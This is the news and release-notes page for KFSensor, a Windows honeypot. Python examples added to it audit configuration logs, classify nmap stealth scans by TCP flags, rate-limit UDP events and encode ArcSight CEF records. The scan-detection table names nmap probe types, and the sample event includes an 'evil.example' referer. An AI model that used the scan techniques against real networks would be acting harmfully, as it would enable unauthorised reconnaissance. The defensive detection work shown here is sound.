KFSensor


KFSensor News

KFSensor version 5.2 released

  • 5 December 2016

Full HTTPS support

The KFSensor HTTP simulated server now supports HTTPS as well as HTTP. This allows visitors to interact with TCP port 443 using TLS-encrypted traffic, as they would expect on that port.

KFSensor will dynamically generate a self-signed certificate for use by the HTTPS simulated service. It is also possible for the simulated server to use a real certificate that has been added to the local Windows certificate store. Note that a freshly generated self-signed certificate is itself a fingerprint: a scanner that checks the issuer, subject and validity dates will see a certificate unlike those on the organisation's real servers, so for a deployment that is meant to look like production, a certificate issued by the same internal CA as the real servers is preferable.

To add this feature to an existing installation, follow the steps below.

Admin action logging

Actions and configuration changes made by an administrator are now recorded in the KFSensor Monitor log file for auditing purposes.

The log files can be found using this search pattern.
C:\kfsensor\logs\sensmon_*.log

The log entries start with "Configuration changed:" and provide the date, user name and the configuration setting changed.
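As an added example (not KeyFocus code), the following Python script pulls the "Configuration changed:" audit entries out of the Monitor log files and flags changes made by an account that is not on the expected-administrators list or made outside working hours. The page only states that an entry starts with "Configuration changed:" and carries the date, user name and the setting changed; the exact field layout encoded in LINE_RE, the working-hours window and the sample log lines are assumptions constructed for this example and should be adjusted to the real files.

```python
"""Added example, not KeyFocus code: audit the KFSensor Monitor log for
configuration changes. The entry layout below is an ASSUMPTION."""
import glob
import re
from datetime import datetime

LOG_GLOB = r"C:\kfsensor\logs\sensmon_*.log"   # search pattern from the release notes

# ASSUMED entry layout (adjust the pattern to the real files):
#   Configuration changed: 2016-12-05 14:02:11 user=CORP\jsmith setting=Listen:TCP/443 enabled
LINE_RE = re.compile(
    r"^Configuration changed:\s+(?P<date>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})"
    r"\s+user=(?P<user>\S+)\s+setting=(?P<setting>.+?)\s*$"
)


def parse_entries(lines):
    """Return one dict per audit entry. Lines that do not match are skipped,
    because the Monitor log also holds ordinary, non-audit messages."""
    entries = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            entries.append({
                "when": datetime.strptime(m.group("date"), "%Y-%m-%d %H:%M:%S"),
                "user": m.group("user"),
                "setting": m.group("setting"),
            })
    return entries


def load_entries(pattern=LOG_GLOB):
    """Read every sensmon_*.log matched by the pattern, sorted by name so the
    entries stay in chronological order across the daily files."""
    entries = []
    for path in sorted(glob.glob(pattern)):
        with open(path, encoding="utf-8", errors="replace") as fh:
            entries.extend(parse_entries(fh))
    return entries


def unexpected_changes(entries, allowed_users, work_start=8, work_end=18):
    """Changes made by an account outside allowed_users, or outside the
    working day (the 08:00-18:00 window is an assumption; tune per site)."""
    flagged = []
    for e in entries:
        by_stranger = e["user"] not in allowed_users
        off_hours = not (work_start <= e["when"].hour < work_end)
        if by_stranger or off_hours:
            flagged.append(e)
    return flagged


# Constructed sample lines for a stand-alone run; NOT real KFSensor output.
SAMPLE_LINES = [
    "Configuration changed: 2016-12-05 14:02:11 user=CORP\\jsmith setting=Listen:TCP/443 enabled",
    "Sensor started, listening on 47 ports",
    "Configuration changed: 2016-12-06 02:17:45 user=CORP\\svc-backup setting=Email alerts disabled",
]

if __name__ == "__main__":
    for e in unexpected_changes(parse_entries(SAMPLE_LINES), {"CORP\\jsmith"}):
        print(f"{e['when']:%Y-%m-%d %H:%M} {e['user']} changed: {e['setting']}")
```

In a real deployment replace SAMPLE_LINES with load_entries() and run the check from a scheduled task, so that a change to the honeypot's own configuration (for example, alerts being switched off at 02:17 by a service account) raises an alert of its own rather than silently reducing coverage.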

Signatures - filter on description and type

The signature engine has been enhanced to enable it to match special types of packets that previously could not be identified. For example, scan packets that contain no payload can now be detected. This is useful for ignoring legitimate servers, such as web proxies, that send out unexpected packets.

KFSensor version 5.1 released

  • 8 June 2016

Improved Stealth Scan detection

Stealth scans cover a range of techniques used by hackers and pen testers to identify hosts, fingerprint OS versions and determine which ports are open on a host. These techniques involve sending non-standard network packets, or non-standard packet sequences, to gain a response from a host without establishing a full connection. They are rarely recorded in system log files and can evade detection by certain security products such as firewalls. nmap is the most popular stealth scanning tool.

KFSensor's detection of stealth scans has been improved in the following ways:

New Event type - Scan

When a network event can be positively identified as a scan then the event is assigned the event type "Scan". Previously these would have been recorded as type "Connection". An event with the type Scan is a much clearer indicator of malicious activity than a connection.

nmap Options decoded

Where possible a scan is decoded to show the nmap option that matches the scan technique. The event's Description field contains the matching nmap command line option.

The following options are individually identified:

  • nmap -sS, SYN (half-open) scan
  • nmap -sN, Null scan
  • nmap -sF, FIN scan
  • nmap -sX, Xmas scan
  • nmap -sM, Maimon scan
  • nmap -sA, ACK scan
N.B. Other security tools and malware may implement the same techniques. The events from these will still be identified using the nmap option, as nmap is the standard scanning tool.
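The decoding described above, as an added example in Python that is not KFSensor's own code: the first inbound packet's TCP flags identify the stateless probes (Null, FIN, Xmas, Maimon, ACK), while a bare SYN is only reported as a SYN scan when the visitor never completes the three-way handshake. The flag bit values are the standard TCP header bits; the sample flows in the main block are constructed for illustration.

```python
"""Added example, not KFSensor code: map a TCP flow's flag sequence to the
nmap option that the release notes say KFSensor reports."""

# TCP flag bits as they appear in the TCP header flags byte.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
ALL = FIN | SYN | RST | PSH | ACK | URG

# First-packet flag combinations that never start a legitimate connection:
# the visitor is probing how the stack answers (open vs closed vs filtered).
STATELESS_PROBES = {
    0:               "nmap -sN",  # Null scan: no flags at all
    FIN:             "nmap -sF",  # FIN scan
    FIN | PSH | URG: "nmap -sX",  # Xmas scan
    FIN | ACK:       "nmap -sM",  # Maimon scan
    ACK:             "nmap -sA",  # ACK scan (firewall rule mapping)
}


def flags_from_str(s):
    """nmap-style letters to bits: 'S' -> SYN, 'FPU' -> FIN|PSH|URG, '' -> 0."""
    table = {"F": FIN, "S": SYN, "R": RST, "P": PSH, "A": ACK, "U": URG}
    return sum(table[c] for c in s.upper())


def classify_flow(packets):
    """packets: list of (direction, flags) in arrival order, where direction
    is 'in' (from the visitor) or 'out' (from the honeypot).
    Returns ('Scan', 'nmap -sX') etc., or ('Connection', None) when the
    visitor behaved like a real client."""
    inbound = [f & ALL for d, f in packets if d == "in"]
    if not inbound:
        return ("Connection", None)
    first = inbound[0]
    if first in STATELESS_PROBES:
        return ("Scan", STATELESS_PROBES[first])
    if first == SYN:
        # Every normal connection also starts with a bare SYN. It is a
        # half-open (SYN) scan only when the visitor never sends the final
        # ACK of the handshake: nmap answers our SYN/ACK with a RST, and a
        # SYN with no follow-up at all is treated the same way.
        completed = any(f & ACK and not f & (SYN | RST) for f in inbound[1:])
        return ("Connection", None) if completed else ("Scan", "nmap -sS")
    return ("Connection", None)


if __name__ == "__main__":
    # Constructed sample flows, not captured traffic.
    samples = {
        "half-open":  [("in", SYN), ("out", SYN | ACK), ("in", RST)],
        "handshake":  [("in", SYN), ("out", SYN | ACK), ("in", ACK), ("in", PSH | ACK)],
        "xmas":       [("in", flags_from_str("FPU"))],
        "null":       [("in", 0)],
    }
    for name, flow in samples.items():
        print(name, classify_flow(flow))
```

The distinction matters for triage: a completed handshake followed by data is a "Connection" worth reading, whereas a flow that matches one of these probes is a "Scan" and can be summarised per source host, which is exactly what the new Scan event type and the scan reports below are for.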

Port Scan changed to Multi-port Scan

In previous versions a 'Port Scan' referred to an attacker connecting to many different port numbers. This type of activity has been renamed a 'Multi-port Scan', to describe it better and to distinguish it from the new Scan event type.

Reports

New reports

Two new reports have been added that enable analysis of the new Scan event type:
  • Top visitor by scan attacks
  • Scan attacks by day

Better error reporting

The previous version would only show "Report Loading..." when a problem occurred. In the new version an error message will be displayed.

Longer time outs

The report loading timeout has been increased from 10 to 60 seconds to cope with slow servers and large data sets.

Fix for missing days in charts

In the previous version chronological charts only contained data points for days that contained data and not for days that contained zero data. The lines drawn between data points would then be misleading as they would skip over the days with zero data. The new version adds data points for all days, so the lines match the data.

Updating indicator

A spinner indicator has been added to the Update button on the report filter to show that a report is being updated.

Better support for MySQL

The new version contains better handling of MySQL connection timeouts. In the previous version the service would need to be restarted after several hours.

KFSensor version 5.0 released

  • 4 May 2016

Reports and Graphs

KFSensor has a new reporting module that provides a variety of reports for advanced data analysis.

Sensor Status Information

To aid the management and administration of KFSensor installations each sensor now records a set of status data. This data provides useful information on the sensor itself and on its host machine. This is particularly useful when administering a large number of sensors, but is still useful with only a single installation.

A new user interface panel has been added below the port tree, in the bottom left of the window to display the sensor status information.

Examples of the sensor status information are: how long the sensor has been running; the list of the host's IP addresses; and the amount of free disk space.

Digital Signatures

All KFSensor modules and installation files are now digitally signed with a code signing certificate. This enables users to ensure that their copy of KFSensor is genuine and has not been tampered with. Our publisher name is "KeyFocus Ltd." and that is the name used in the certificate. Before installing, the signature can be checked with PowerShell's Get-AuthenticodeSignature or with signtool verify /pa; the signer shown should be "KeyFocus Ltd." and the status should be valid.

Other Fixes

A number of minor fixes and improvements have been made to the system, in particular with the way the collation and logging modules handle larger data sets.

KFSensor version 4.12 released

  • 21 December 2015

More Listen definitions

24 more ports have been added to the standard configuration in this release. These have been identified as being popular targets for scanning and exploitation. They include new Trojans and new services increasingly found on networks such as Mongo and Minecraft.

Packet Data storage management

The management of packet data storage has been improved to enable the automatic deletion of old packet data. This ensures that the total packet data stored by KFSensor will not exceed a maximum size and fill up the available disk space.

To enable this functionality, select the Settings -> Network Protocol Analyzer menu and set the Retention Period field to a suitable value, such as 30 or 90 days.

IIS 8 Emulation

The Sim Server emulation of IIS now supports IIS version 8.

No reconfiguration should be necessary as the default setting is to select the IIS emulation automatically.

Better UDP Handling

KFSensor attempts to identify and ignore UDP traffic that is locally initiated. Certain routers do not always translate the source IP addresses of UDP response packets. This caused KFSensor to wrongly identify these as unknown packets and therefore raise events for them. New algorithms have been added to KFSensor's packet analyser to identify this situation and reduce the number of false-positive events generated.

KFSensor version 4.11.4 released

  • 4 April 2015
Updated signature import support
  • Rulemaster has been updated to work with the new snort.org download format.
  • Support for importing the emergingthreats.net rule base.
  • Added support for the dsize snort rule option
Facility to replicate scenarios across sensors
  • To make it easier to set up multiple installations with the same custom configuration we have added the ability to easily export a scenario from one sensor and then import it into another sensor.
  • First configure one sensor exactly as you want it.
  • Then export the selected scenario from that sensor to a file.
  • Next import the file into another sensor. The listen and sim server definitions will then be identical to the first sensor.
  • Use the Edit Scenarios dialog box to export or import scenario definitions.
Improved ArcSight CEF format support
  • For HTTP traffic KFSensor now adds the URL, Host, User-Agent, and Referer fields to the event description. This makes these details available in CEF logging.
Bug fixes
  • Invalid event dates/times on virtual machines. When running Windows on a virtual machine there is a rare problem where the network card reports an incorrect time stamp. This was being picked up by KFSensor and reported as the time of the event. KFSensor has now been changed so that it double checks the accuracy of time events and corrects this issue before it gets logged.
  • External Console Applications. Certain applications require their own console in order to function properly. A new option has been added that provides one.
  • It is now possible to set zero as an option for the max emails alert setting.

KFSensor version 4.10.0 released

  • 20 August 2014
UDP Handling

The big change in this release is how KFSensor handles UDP traffic. In previous versions UDP was treated in much the same way as TCP. Both shared the same DOS limit and port scan settings. This worked reasonably well in the past, but the way UDP is being used has changed in recent years. This has resulted in much more UDP traffic being sent across local networks and led to a large number of unnecessary events being logged by KFSensor.

We have made many changes to the way KFSensor handles UDP traffic and the result of this is a big reduction in the number of UDP events generated. Fewer events make it easier to identify the important and unusual events that can indicate attacks on your network.

Recent Trends in UDP usage

Continual broadcast: Applications like Dropbox send out UDP broadcast messages every few seconds to announce their presence on the local network and to discover other machines running the same application. In the past this behaviour was restricted to DHCP.

Multicast: New Microsoft protocols such as Link-Local Multicast Name Resolution cause multiple machines to respond by broadcasting UDP packets to the entire subnet, instead of sending them directly to the requester.

UDP System Improvements

UDP Specific DOS Settings

The DOS Settings dialog has been changed from a single page to a dialog with multiple tabs, one for each protocol. The UDP and TCP protocols now have their own settings and limits. This enables a greater degree of control and allows for differences in the way protocols work to be reflected in how they are handled.

Port specific limits

Each UDP port now has its own limits. This means that when the limit is reached, only traffic on that UDP port will be ignored from a host. For example, only 3 Dropbox broadcasts will be recorded for each machine, and this will not affect the recording of any other types of UDP traffic from those machines.

In previous versions it was possible to set port-specific limits for specified ports. In the new version every port is given its own limit automatically.

Ignore expires

In previous versions, traffic that had triggered an ignore rule kept that ignore state until the sensor was restarted. Now the ignore status can be set to expire; the default is 24 hours.
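The per-port limit and the expiring ignore state described above, as an added example in Python (not KFSensor's own code). The limit of 3 and the 24-hour expiry are the values given on this page; the counting model (a plain counter that is only reset when the ignore state lapses, rather than a sliding window) and the sample host addresses are assumptions made for the example. UDP 17500 is used as the sample port because it is Dropbox's LAN discovery port.

```python
"""Added example, not KFSensor code: per-(source host, UDP port) event
limiter with an ignore state that expires."""
from datetime import datetime, timedelta


class UdpEventLimiter:
    def __init__(self, limit=3, ignore_ttl=timedelta(hours=24)):
        self.limit = limit                 # events logged per host/port before ignoring
        self.ignore_ttl = ignore_ttl       # how long the ignore state lasts
        self._count = {}                   # (src_ip, dst_port) -> datagrams counted
        self._ignore_until = {}            # (src_ip, dst_port) -> when the ignore lapses

    def should_log(self, src_ip, dst_port, now):
        """True if a datagram from src_ip to dst_port should raise an event
        at time `now`; False if it falls under an active ignore. The key is
        the host AND the port, so a chatty broadcaster on one port does not
        suppress events for the same host on any other port."""
        key = (src_ip, dst_port)
        until = self._ignore_until.get(key)
        if until is not None:
            if now < until:
                return False
            # Ignore expired: forget it and start counting again, so a host
            # that keeps broadcasting reappears in the log once per TTL
            # instead of vanishing until the sensor restarts.
            del self._ignore_until[key]
            self._count[key] = 0
        n = self._count.get(key, 0) + 1
        self._count[key] = n
        if n > self.limit:
            self._ignore_until[key] = now + self.ignore_ttl
            return False
        return True

    def ignored_keys(self, now):
        """Host/port pairs currently under an ignore (useful for a status view)."""
        return sorted(k for k, until in self._ignore_until.items() if now < until)


if __name__ == "__main__":
    # Constructed sample traffic: one machine broadcasting every 30 seconds.
    t0 = datetime(2016, 1, 1, 9, 0, 0)
    limiter = UdpEventLimiter()
    for i in range(6):
        now = t0 + timedelta(seconds=30 * i)
        print(now.time(), "log" if limiter.should_log("10.0.0.5", 17500, now) else "ignored")
    print("ignored at 10:00:", limiter.ignored_keys(t0 + timedelta(hours=1)))
```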

Better matching of outgoing and incoming UDP

KFSensor is now better at matching UDP traffic received in response to a request sent from the KFSensor host itself. This enables it to ignore such traffic, while still able to generate events for unexpected traffic.

IP fragmentation

KFSensor now handles IP fragmented packets better, preventing the occasional event being mis-recorded because of malformed packets.

Better HTML reports

The layout of exported events has been improved, by adding styling to the HTML output.

The File->Export->Event List option now defaults to HTML output.

If required, the report styling can be configured by editing the C:\kfsensor\conf\reportstyle.css configuration file.

KFSensor version 4.9.2 released

  • 21 May 2013
Support for 64-bit Windows

KFSensor has always worked on 32-bit versions of Windows. It has also worked on 64-bit Windows, but there were limitations on certain features and a few stability problems with the network packet capture module. This meant we did not claim to support 64-bit versions of Windows.

With version 4.9 we have done extensive testing on 64-bit versions and identified and fixed known issues on that environment.

So we now officially support 64-bit versions of the following Windows versions:

  • Windows 7
  • Windows 8
  • Windows Server 2008 R2
Windows audit monitoring

The best way for a honeypot to maximize the information on an attack is to give as realistic a service response as possible to an attacker. The ideal is to use the real service, however this has not been practical due to the risks of compromise involved.

In the past KFSensor has attempted to replace every Windows service with a simulated service to allow safe detection of threats. Windows services such as IIS and RPC were notoriously vulnerable to attack, especially on machines connected directly to the public Internet.

Microsoft have made huge improvements to the security of Windows in recent years, and a properly patched modern version of Windows is safe enough to use on an internal network without taking special measures to lock it down. Such machines are still a target for attack, however: weak passwords on RDP and open file shares are exploited.

KFSensor has long been able to monitor the network traffic of other services and log events in the same way as its own simulated services. This has been improved upon in version 4.9 by enabling KFSensor to monitor the auditing features of Windows itself to get more information on an attack.

This approach enables Windows shared folders to be set up and monitored by KFSensor. Extra information, such as the domain user account and Windows machine name of an attacker, can now be captured as well as the machine's IP address.

Events logged as a result of information from Windows services are identified by the new 'WIN' protocol, which is used to distinguish them from events derived from the standard networking protocols such as TCP and UDP.

This functionality is enabled by default in KFSensor, but extra configuration work is required to set the correct Windows audit settings. A new section, 'Windows Audit configuration', has been added to the manual giving a detailed guide to what needs to be done.

MySQL support

Recent versions of MySQL introduced new reserved words that meant KFSensor was no longer compatible with it. The new version of KFSensor is compatible with current MySQL again.

These changes require an existing KFSensor database to be updated, even if it is running on SQL Server.

To perform the database update, after upgrading to version 4.9, go to the Settings -> Log Database... menu and press the Configure button.

KFSensor version 4.8.0 released

  • 16 August 2012
ArcSight CEF Format Support
  • KFSensor can be configured to forward events to ArcSight in CEF format. This streamlines and simplifies the integration of KFSensor with the ArcSight Enterprise Threat and Risk Management (ETRM) platform.
  • The Common Event Format (CEF) is an open log management standard that improves the interoperability of security-related information from different security and network devices and applications. CEF enables technology companies and customers to use a common event log format so that data can easily be collected and aggregated for analysis by an enterprise management system.
  • Setting up KFSensor to integrate with ArcSight is simply a matter of opening the SysLog Alerts menu option, entering the ArcSight server IP address and selecting CEF as the alert format.
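For anyone checking what the collector receives, or writing a parser for it, the following is an added Python example (not KFSensor's or ArcSight's code) of building a CEF:0 record for a honeypot HTTP event and parsing it back, with the escaping the CEF standard requires: header fields escape '|' and backslash, extension values escape '=', backslash and line breaks. The vendor, product, version and signature values, and the sample event, are assumptions; the page does not document what KFSensor itself emits.

```python
"""Added example, not KFSensor or ArcSight code: CEF:0 encode/decode with
correct escaping. Field values for the sample event are ASSUMED."""
import re


def _esc_header(value):
    # Header fields: escape backslash first, then the field separator.
    return str(value).replace("\\", "\\\\").replace("|", "\\|")


def _esc_ext_value(value):
    # Extension values: '|' is allowed here, but '=' and backslash are not,
    # and a raw newline would split the syslog record.
    return (str(value).replace("\\", "\\\\").replace("=", "\\=")
            .replace("\r", "\\r").replace("\n", "\\n"))


def to_cef(vendor, product, version, sig_id, name, severity, extension):
    """extension: dict of CEF key -> value, e.g. {'src': '203.0.113.9'}."""
    if not 0 <= int(severity) <= 10:
        raise ValueError("CEF severity must be 0-10")
    header = "|".join(_esc_header(v) for v in (vendor, product, version, sig_id, name, severity))
    ext = " ".join(f"{k}={_esc_ext_value(v)}" for k, v in extension.items())
    return f"CEF:0|{header}|{ext}"


def _unescape(s):
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append({"n": "\n", "r": "\r"}.get(s[i + 1], s[i + 1]))
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_cef(line):
    """Inverse of to_cef: returns (list of 6 header fields, extension dict).
    The header is scanned character by character so an escaped '|' inside a
    field is not mistaken for a separator."""
    if not line.startswith("CEF:0|"):
        raise ValueError("not a CEF:0 record")
    rest, fields, cur, i = line[6:], [], [], 0
    while len(fields) < 6 and i < len(rest):
        if rest[i] == "\\" and i + 1 < len(rest):
            cur.append(rest[i:i + 2])        # keep the escape pair for _unescape
            i += 2
        elif rest[i] == "|":
            fields.append(_unescape("".join(cur)))
            cur = []
            i += 1
        else:
            cur.append(rest[i])
            i += 1
    if len(fields) != 6:
        raise ValueError("truncated CEF header")
    ext_raw = rest[i:]
    # Keys are bare words followed by an unescaped '='; values may contain spaces.
    keys = list(re.finditer(r"(?:^|\s)(\w+)=", ext_raw))
    ext = {}
    for n, m in enumerate(keys):
        end = keys[n + 1].start() if n + 1 < len(keys) else len(ext_raw)
        ext[m.group(1)] = _unescape(ext_raw[m.end():end])
    return fields, ext


# Constructed sample event (assumed values, not KFSensor output).
SAMPLE_EVENT = to_cef("KeyFocus", "KFSensor", "4.11", "HTTP", "Sim Server|HTTP", 5, {
    "src": "203.0.113.9", "dpt": 80, "request": "/admin.php?x=1",
    "requestClientApplication": "curl/7.0 (x86_64)", "requestContext": "http://evil.example/",
})

if __name__ == "__main__":
    print(SAMPLE_EVENT)
    print(parse_cef(SAMPLE_EVENT))
```

The CEF keys `request`, `requestClientApplication` and `requestContext` are the dictionary names ArcSight uses for the URL, User-Agent and Referer respectively, which is why the 4.11.4 change that adds those HTTP fields to the event description matters for CEF consumers.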
Visitor Rule Distribution
  • Centrally defined visitor rules can now be distributed to all sensors automatically. This makes it faster and easier to reduce false positive results consistently across all sensors.
  • To make use of this facility define a new rule on the local sensor on the KFSensor administrator machine. The collator service will then distribute this rule to all sensors.
  • The full enterprise configuration must be enabled for this to work.
Common Configuration file
  • To make it easier to set up new sensors with a standard configuration, a new local configuration file is now created that contains the machine-specific information. This allows the main configuration file to be replaced without losing the machine-specific settings.

KFSensor version 4.7.0 released

  • 1 March 2010
Windows 7 Compatibility
  • The simulated servers such as IIS, FTP and shell have been updated to be able to simulate Windows 7
  • Various internal compatibility updates to support Windows 7.
Automatic simulation selection
  • Simulated servers such as IIS can simulate several different versions.
  • The selection of the version is now set to automatic, which enables the appropriate simulation to be selected for the base operating system.
  • Specific simulation version selection can still be made in the configuration
WinPcap
  • KFSensor now supports WinPcap 4.1.1 (this is now the preferred WinPcap version)
Message Queuing Service
  • Added definitions for services specific to the Message Queuing Service
New Scanner Friendly DOS Setting
  • The default DOS Attack settings detect scanners, such as nmap, and block them after a few scans
  • A new 'Scanner Friendly' button has been added to the 'DOS Attack Settings' dialog box.
  • The Scanner Friendly setting massively increases the DOS limits, allowing a full scan of the KFSensor machine to be run

KFSensor version 4.5.0 released

  • 3 July 2008
New Features
Full Enterprise Mode

This version introduces major enhancements to the way in which KFSensor Enterprise operates. Together these enhancements have been named Full Enterprise Mode.

In the Full Enterprise Mode events from each sensor are inserted into a central database and copies of each sensor's event log files are additionally made on the Administration installation. This is done automatically by a background service on the Administration machine.

The Full Enterprise Mode provides these benefits:
  • Improved performance
    The Administration console has faster local access to each sensor's events.
  • Central store of events
    Making a central copy of all events from each sensor means there is less need to make regular backups of the sensor machines' disk drives. Storing all events in a central database also makes it easier to develop custom reports of all the activity on the entire network.
  • Easier signature rule base management
    Simply update the signatures on the Administration machine and have it deployed to each sensor automatically and securely.
  • Central alerts
    Each Sensor can be configured to send alerts, for example by email. In the Full Enterprise Mode there is the option of sending the alerts from the Administration machine instead of the Sensor machine. Handling the sending of alerts from all sensors in one location makes configuration easier. It also gets around common problems, such as a Sensor located in a DMZ not having access to the internal SMTP server to send an email alert.
  • Runs in the background
    These benefits are provided by a system service, so it works without the need for a user to be logged on.

Enabling Full Enterprise Mode requires additional but straightforward configuration that is fully described in the KFSensor Administration Guide. This is an optional feature and can be enabled or disabled at any time, so there is no need to postpone upgrading to the new version.

Vista ports
  • Added definitions for services specific to Windows Vista
  • Web Services for Devices
  • IIS version 7 simulator
WinPcap
  • KFSensor now supports the latest WinPcap version 4.1.
Memory management
  • Improvements to the code have resulted in a smaller memory footprint, which will aid system performance in cases of heavy load.

KFSensor version 4.4.0 released

  • 2 November 2007
New Features
MySql Server - Sim Std Servers
  • Handles protocol negotiation
  • Decrypts packets
  • Allows visitor to browse database schemas
WinPcap
  • KFSensor now supports WinPcap version 4.0.
Ignore broadcasts
  • The visitor rules can now take the sensor IP address as a condition
  • This allows rules to be written specific to the broadcast address.
  • e.g. ignore all UDP broadcasts on a particular port.
Other
  • Increased session limits
  • Reduced memory requirements

KFSensor version 4.3.0 released

  • 11 December 2006
New Features
Vista Compatibility
  • Previous versions of KFSensor will work with Windows Vista, but require an elevated level of admin access rights.
  • The location of the KFSensor configuration files has been moved in new version to make configuration easier with Windows Vista.
  • A new setting in the Server Settings dialog called "Home Root Path" allows this directory to be changed.
WinPcap
  • KFSensor now supports WinPcap version 4.0 beta 2.
Signature Rule Flags
  • New feature to allow more complex rules to be developed.
  • Better supports rules from publicly available sources, resulting in fewer false positives.

KFSensor version 4.2.0 released

  • 16 June 2006
New Features
This point release contains a number of minor enhancements made in response to user feedback.
EMail Event Filter
  • The EMail alert filter functionality has been enhanced in version 4.2
  • It is now possible to specify how many email alerts can be sent in each time period
  • There is a separate limit for each visitor and for the total
Signature Rule Event Severity Options
  • A signature rule contains the option to change the severity of an event. This may have the effect of reducing the severity set by the listen definition. In order to control this behaviour there are three different options:
Event On (Port Scan)
  • This option is used to monitor the number of different ports in the same way as the option above. When the limit is reached for this setting, a port scan event will be logged.
  • This enables port scans to be detected without blocking the visitor.
Check For New Version Update
  • This new menu option checks with the KeyFocus web site to see if you are running the latest version.

KFSensor is available in three editions; Standard, Professional and Enterprise.
To compare which features are available in each edition view the Compare Edition page.

KFSensor version 4.1.0 released

  • 8 May 2006
New Features
Color Coding
  • Each event in the event view is assigned a color based on its protocol and severity.
  • Ports and visitors are assigned a color based on how recent their last activity is.
  • All colors are customizable through the new Event Colors dialog box.
Visitor Rules
  • Quick Create Visitor Rule option added as a right click context menu option on the events view and as a button on the Event Details dialog.
  • Visitor rules have been extended to allow a host computer's DNS name to be specified, instead of just the IP address.
    This is useful when writing a rule to exclude a host that uses dynamic IP allocation.
Multiple IPs
  • The Scenario Change All dialog has been enhanced to make it easier to set up different behaviour for each IP hosted by the machine.
Bug fix
  • Problems logging to a MS SQL Server database have been resolved


KFSensor version 4.0.1 released

  • 4 January 2006
KFSensor Standard Edition
KFSensor Standard is the newest edition in the KFSensor range. It provides all the core features required to run an effective honeypot system at a basic price.
New Professional Edition Features
Network Protocol Analyzer
  • Detects connections to all TCP and UDP ports, even closed ports
  • Detects ICMP messages
Native Listen Type
  • Monitors production software services as part of the honeypot
Improved Port Management
  • All listen definitions associated with a service class
  • Enables whole classes of services to be added or removed from a scenario
Port hiding
  • Little used ports can now be hidden, until an event occurs
  • Makes port interface more manageable
DHCP Sim Server
  • Provides protocol decoding for this important service
Import Events
  • Import events stored in a log file into an ODBC database

KFSensor is now available in three editions; Standard, Professional and Enterprise.
To compare which features are available in each edition view the Compare Edition page.

KFSensor version 3.0.4 released

  • 25 July 2005
New Features
Remote Administration - KFSensor Enterprise
  • Ability to control multiple sensors from one monitor.
  • Ability to view events from multiple sensors from one monitor.
High Security Communications
  • Both client and server authentication with 3072 bit RSA public/private keys
  • 256 bit AES encrypted data traffic
  • Randomized data contents and data sizes, so the management traffic does not match network signatures
Signature Engine
  • KFSensor is the first product to combine the benefits of signature-based IDS with a honeypot system.
  • Fast signature search engine, which has a minimal impact on system performance.
  • Handles thousands of rules
  • String, regular expressions and byte testing rules supported
  • Easy maintenance and updating of new rules from different sources
  • Create new rules directly from an event
  • Export rules in KFSensor or Snort format
New Port and Event Icons
  • Eight different icons to represent different service types
  • Easier to distinguish different types of events
New Event Details Dialog
  • Multi-tabbed Event details dialog
  • Four different information layouts
  • More details available for each event
Easy Scenario Upgrade
  • New dialog to import new sim server and listen definitions
  • Easy to update existing installation with the latest threats
Scanner cloaking
  • Vulnerability scanners attempt to interrogate every open port on a target server
  • It is now possible to specify the maximum number of ports a visitor can connect to before being locked out
CMD Command console - Sim Std Server
  • Emulates the Windows command shell, otherwise known as a DOS box
  • As used by a number of worms to install a rootkit

Windows & .NET Magazine - Lab Report

  • 2 April 2004

The April edition of Windows & .NET Magazine features an in-depth lab report on Honeypots for Windows.

This is what they had to say about KFSensor:

"KFSensor appears to be the only virtual honeypot in this review with a clear sense of what it takes to appear to be a Windows host."

"This functionality puts KFSensor in the top echelon of Windows honeypots."

"If you want a feature-packed Windows honeypot that's easy to install and use, KFSensor is the clear choice for you."

Windows & .NET Magazine

Read the lab report on Windows & .NET Magazine's web site

KFSensor version 2.1.4 released

  • 22 March 2004
New Anti-spam technology
KFSensor 2.1.4 contains innovative new technology and dozens of enhancements that enable it to intercept and block spam.

Exploiting insecure HTTP proxy and SOCKS servers is now the preferred method used by spammers to relay large quantities of spam, whilst maintaining their own anonymity.

By emulating these insecure servers KFSensor is able to deceive spammers into using its honeypot to attempt to send spam whilst secretly blocking the spam from being relayed to its intended victim.

A typical deployment of KFSensor can block an average of 500,000 spam messages a day and provide valuable information that can identify the true source of the spam it blocks.


Major New features in version 2.1.4

SOCKS - Sim Std Server
  • Handles protocol negotiation
  • Supports SOCKS 4/4A/5
  • Handles proxy chaining requests
  • Redirects proxy connections to internal emulations
  • Various tricks to fool proxy testing scripts
  • Eight different configuration levels
HTTP Proxy
  • Extension of HTTP emulation to cover HTTP and CONNECT proxying
  • Eight different configuration levels
Proxy rules
  • Use an external script to provide logic to determine if a proxy connection should be allowed
  • Process captured spam to produce custom reports
  • Works for all proxy types; SOCKS, HTTP and SMTP relay
New DOS Attack Options
  • Options to enable KFSensor to accept a large number of connections without locking out a visitor or generating too many events
MS SQL Server - Sim Std Servers
  • Handles protocol negotiation
  • Decrypts login packets
  • Correctly refuses login requests
  • Handles SQL Server UDP information requests
Many extra minor enhancements and updates

KeyFocus announces the world's first Windows networking emulation honeypot

  • 31 Oct 2003

For Immediate Release

KeyFocus, an Internet security provider, announces the world's first Windows networking emulation honeypot, a key feature of the major new release of its flagship product KFSensor 2.0, its honeypot based intrusion detection system.

This groundbreaking technology enables KFSensor to detect the nature of attacks on file shares and Windows administrative services – currently the most prevalent and damaging of all illicit intrusions performed over the Internet.

Firewalls can detect port scans, but they cannot identify the nature of an attack. Network Intrusion Detection Systems can identify certain attacks, but not without running the risk of jeopardizing security. Only KFSensor can provide optimal information on an attack, without the risk of compromise.

KFSensor emulates all four of Microsoft's NetBIOS and SMB/CIFS services, allowing hackers and a whole class of worms, such as Randex and Opaserv, to attempt to exploit insecure file shares and other vulnerabilities in a secure environment. Consequently, KFSensor provides a level of analysis never before available to security professionals.

The already extensive emulation and reporting features of KFSensor have been further extended – adding the capability for users to write their own scripts and database queries. These are compatible with scripts written for the Honeyd system.

About KFSensor
KFSensor is a host based Intrusion Detection System (IDS). It acts as a honeypot to attract and detect hackers by simulating vulnerable system services and trojans.

The system is highly configurable and features detailed logging, analysis of attacks, multiple alerting mechanisms and sophisticated emulations of standard systems services. This approach complements other forms of security and adds another defense against the growing security threat faced by all organizations.

